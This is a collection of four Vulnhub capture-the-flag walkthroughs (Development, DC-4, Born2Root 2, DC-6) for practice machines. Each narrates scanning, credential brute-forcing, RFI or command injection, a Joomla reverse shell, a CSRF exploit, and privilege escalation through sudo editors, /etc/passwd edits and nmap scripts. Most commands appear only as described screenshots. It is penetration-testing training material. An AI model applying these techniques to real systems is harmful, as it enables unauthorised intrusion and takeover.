Development: Vulnhub Walkthrough

Today we are going to take on another challenge known as “DEVELOPMENT”. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived and made

slightly more nefarious than the original. The author of this VM machine is “Donavan”. Our goal is to get the flag to complete the challenge.

Download it from here: https://download.vulnhub.com/digitalworld/devt-improved.7z

Security Level: Intermediate

Penetrating Methodology:

Scanning

  • Netdiscover
  • NMAP

Enumeration

  • Run http service
  • Web spidering

Exploiting

  • Remote File Inclusion
  • Ssh login

Privilege Escalation

  • Exploit sudo rights
  • adding new user

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.104.

Time to scan the Target’s IP with Nmap.

We can clearly see from screenshot a few open ports e.g. 22(ssh),139(NetBIOS-ssn), 445(NetBIOS-ssn), 8080(http-proxy).

Enumeration

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in the browser. Here we got a clue about some html_pages. It could either be any Directory or a webpage.

So, let’s dig into the source code if we can find something useful. Here they are talking about some Development secret page and Patrick is being mentioned, he could be a user:

Now moving ahead lets surf through the webpage mentioned earlier which is html_pages. Here again, we can see a few html files in which “development.html” could be of our interest.

When you visit development.html, you can find a mention of “hackersecretpage” nothing else seems useful.

Again we went through the source code of the same and found “./developmentsecretpage” .This seems our secret page.

If you visit the page, it is confirming to be the Development secret page and a PHP file link named ‘Patrick’.

If we visit the file link it opens a page with another file included in it named ‘Sitemap’.

And when we visit /sitemap.php, we clicked on the embedded link stating “Click here to logout” which turned out to be Login page.

Exploitation

We just tried random login credentials “admin” for both username and password and 1234 that’s a success.  

Here we are getting a short of error message on the top of the page. So we Googled about it. 

We found an exploit for the same listed on Exploit-db with the name of “/[path]/slog_users.txt” which is vulnerable to RFI. Refer CVE code: 2008-5762/63.

 

When we appended the slog_users.txt file with our webpage we found four users and their password hashes.

After decrypting the hashes, we got passwords in clear text for an intern, Patrick and qiu respectively but not for Admin.

Privilege Escalation

As we knew port 22 is open for ssh so here I try to login into ssh using intern and we got access of ssh as shown below. After that, we found a list of commands that are allowed to run here. Then we checklist of files using ‘ls’ as it was one of the allowed commands. We found two text files here ‘local.txt’ and ‘work.txt’ but when we try to open them, we failed.

Hmm! we got access of restricted shell where we can run only a few commands allowed by admin. So, to import proper tty shell, we can import ‘/bin/bash’ by using the following command:

Next, we try again accessing the same ‘local.txt’ file and it just shows a congratulatory message, so we moved on to work.txt, here as well it is showing we have to move further with user Patrick and we already knew Patrick’s password.

NOTE: At first attempt, you will get an error SSH connection refuse, therefore restart the Vulnerable machine to get connect with SSH.

After logging in as patrick, we check the sudo rights for him where I found Patrick has ALL Users permissions including root user to run vim and nano as shown below.

In another terminal in my local machine, I have generated a new encrypted password: pass123 whose salt is ignite using OpenSSL and copy the salt password.

Next, by providing sudo access to any editor(either vim or nano ) we can read as well as edit any system file which is restricted to access by any lower privilege user such as /etc/passwd file.  

Since Patrick has sudo rights which means he can modify the root files too, therefore I decided to insert a new user with root privilege in the /etc/passwd file.

As you can see in the screenshot below, we have added a user ‘RAJ’ and with an encrypted password and we have given all root privileges to it as well.

Capturing the flag

What we are waiting for, lets login using raj. Hereafter listing the content we found the proof.txt file from the inside root directory. we opened it using cat and captured the flag.

Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here

DC-4 Vulnhub Walkthrough

Today we are going to take another boot2root challenge known as “DC-4”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here

Security Level: Beginner

Penetrating Methodology

Scanning

  • Discovering Targets IP
  • Network scanning (Nmap)

Exploiting

  • Surfing HTTP service port
  • HTTP Login credential Bruteforce (Burpsuite)
  • Command Injection
  • SSH Login Credentials Bruteforce (Hydra)

Lateral Movement

  • Logging into SSH and Enumerating Directories
  • Obtain credentials in /var/mail directory

Privilege Escalation

  • Check Sudo rights
  • Adding new user /etc/passwd with sudo
  • Access root directory
  • Capture the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.

Exploiting

From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser and found an Admin Information Security Login page. We clearly need to find credentials for it.  Let’s work on that.

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Targets in the browser and found the Admin Information Security Login page. Now credentials need to be found for login, Let’s work on this.

We Fired UP!! burpsuite using rockyou.txt to get valid login.

Username- admin

After bruteforcing, we have found the password for Admin i.e

Password- happy

We have successfully logged in as Admin. Under system tools, the hyperlink command looks suspicious here. So, let’s check it out.

Command option looks useful as It displayed some options to Run Command. Here we used list file option which displayed files of the database. We also got a hint from the ls command which executes ls-l, we might make some changes in it.

So, we captured the Webpage request using Burpsuite and Send the request to the repeater. Here we can make the desired changes to the request and check out its response.

Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.

Exploring the home directory for user Jim, after that, we checked out the backups folder.

We have found a old-passwords.bak file is a backup password file.

Exploring the contents of the file, we found a list of passwords. They might come in handy later.

We thought of checking /etc/passwd is readable or not and found some useful usernames.

We have created a dictionary for users and passwords with the previously discovered credentials. Let’s bruteforce for ssh login using hydra.

So, the credentials found:

Login- jim

Password- jibril04

Lateral Moment

Logging into ssh using the credentials.

While enumeration, we found two files and read their contents. But they didn’t give direct clue to move ahead.

when I open mbox, I saw a test mail in this, send by root to jim.

After some time thinking, it suddenly strikes us to check the /var/mail folder. Maybe it might contain something, and our instinct was right. We have found some credentials.

Privilege Escalation

Let’s login into charles with password ^xHhA&hvim0y.

After enumeration, we check sudo right for Charles and found that he run the editor teehee as root with no password. After that, we have added raaj in the etc/passwd using echo and teehee as shown.

Logging into raaj as root user and inside the root directory, we have found our FINAL FLAG.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Born2Root: 2: Vulnhub Walkthrough

Hello Friends!! Today we are going to take another CTF challenge named “Born2Root: 2”. The credit for making this VM machine goes to “Hadi Mene”. It is available on the Vulnhub website. Although there is no description provided at the current time on the Vulnhub website, we assume that we will have to gain the root access and find a flag.

Security Level: Intermediate

Penetrating Methodology

  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Capture the Flag

Walkthrough

Let’s start off with scanning the network to find our target.

We found out target: 192.168.1.9

Time to scan the Target’s IP with nmap. Nmap scan result shows 3 major ports open, 22(SSH), 88(HTTP) and 111(RPC).    

Since port 80 is running HTTP, so we considered opening the Target IP Address on the Browser. This gives us an attractive looking webpage although after spending a considerable amount of time. We found that this is nothing but a distraction. We couldn’t find anything of importance on the website. 

So now we moved on to try the Directory Bruteforcing to get any hints. The drib scan gives us the Joomla directory. This is a major breakthrough. Now it’s time to exploit machine through Joomla.

Now that we have found the joomla directory, we will browse the joomla directory on our browser. Here we have the blog made by the author. This is titled Tim’s Blog. This could be a hint for a username. Let’s keep that in mind. Now as we can see that we have a Login Form in the bottom right. Now we will have to guess the user credentials.

Now, it is by convention to try the default credentials first. A quick search, informs us that the default username for Joomla is ‘admin’. Now for the password, we will have to perform a dictionary attack. For that, we will create a dictionary from the words present on the webpage using ‘cewl’.

Now that we have the dictionary named dict.txt. Its time to perform the bruteforce. We will use the BurpSuite to perform the bruteforce. To learn more about this, refer to this article. This bruteforce force gives us “travel” as the password.

Now we will use these credentials to login in Joomla:

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the php reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below.

After we got the shell, now it was time to enumerate the machine in order to exploit further. It took us a couple of hours of hard work around the machine. We ran a bunch of scripts and much else. At last, our search at the ended when we stumbled upon the opt directory. Inside this directory, we found the scripts directory and that contained the fileshare.py. Upon close inspection of the fileshare.py file, we got the login credentials as shown in the given image.

After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:

After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

DC6-Lab Walkthrough

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here – https://www.five86.com/dc-6.html

Table of Content

  1. Scanning
  • Netdiscover
  • NMAP
  1. Enumeration
  • WPSCAN
  1. Exploiting
  • Searchsploit
  1. Privilege Escalation
  • sudo rights
  1. Capture the Flag

Walkthrough

Here the author has left a clue which will be helpful in this CTF.

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. 😉

Scanning

Now, start the CTF challenge by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP 192.168.1.103.

Then, it’s time to run nmap following command to identify open ports and running services.

As ever, this time also we got port 22 and 80 is open for SSH and HTTP services, moreover all HTTP services are made to redirected on domain i.e. //wordy

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.

Enumeration

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

Since I didn’t find any remarkable clue on the website, therefore, the next idea that came to us was to run a wpscan on the webpage and see what the scan enumerates for us.

Hmmm!! Not bad, here I got usernames as shown in the below image.

Moreover, in a text file named users, I saved all the usernames that I had found from WPScan. If you remember the CLUE I discussed at the beginning of the post, generating a password dictionary would be helpful.

We have successfully found the password for the mark; Let’s make good use of them.

mark:helpdesk01

Exploiting

After login into WordPress, I notice a plugin “Active-monitor” is installed in the dashboard.

So, quickly I checked for its exploit inside searchsploit and surprisingly I found this plugin is vulnerable to reflected XSS and CSRF attack, moreover this vulnerability cloud lead to remote code execution. You will get its exploit from searchsploit which is an html form to exploit CSRF attack.

From searchsploit I found 45274.html file to exploit CRSF attack, but before executing it we need to make to some Cosmo changes as shown below and launch netcat listener.

Now, execute the shell.html file to get the reverse connection.

OKAY!! We got a reverse connection at netcat, where I need to run python command to spawn a proper shell. While traversing I found a bash “backup.sh” and tar “backups.tar.gz” and moreover I found a text file “things-to-do” from inside /home/mark/stuff which stored credential for another user “graham” as shown below.

graham : GSo7isUM1D4

Privilege Escalation

As we knew port 22 is open for ssh and here I try to connect with ssh using graham : GSo7isUM1D4 and luckily I got ssh access as shown below. Since this is boot to root challenge where I need to escalate privilege for root access.

Therefore, I check for sudo rights, where I found Graham can execute backup.sh as jens without a password.

After reading this bash script, I decided to edit this file by adding /bin/bash as shown below.

Then with the sudo right I executed the following command successfully login as jeans.

Now when we have access to jens shell and further I check sudo rights for jeans. As per suoders file permission, jens can run nmap as root. To escalate root privilege, I generate a nmap script to access /bin/sh shell called root.nse and then use nmap command to run the script with sudo.

WELL DONE! We have found the final flag and complete the challenges.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here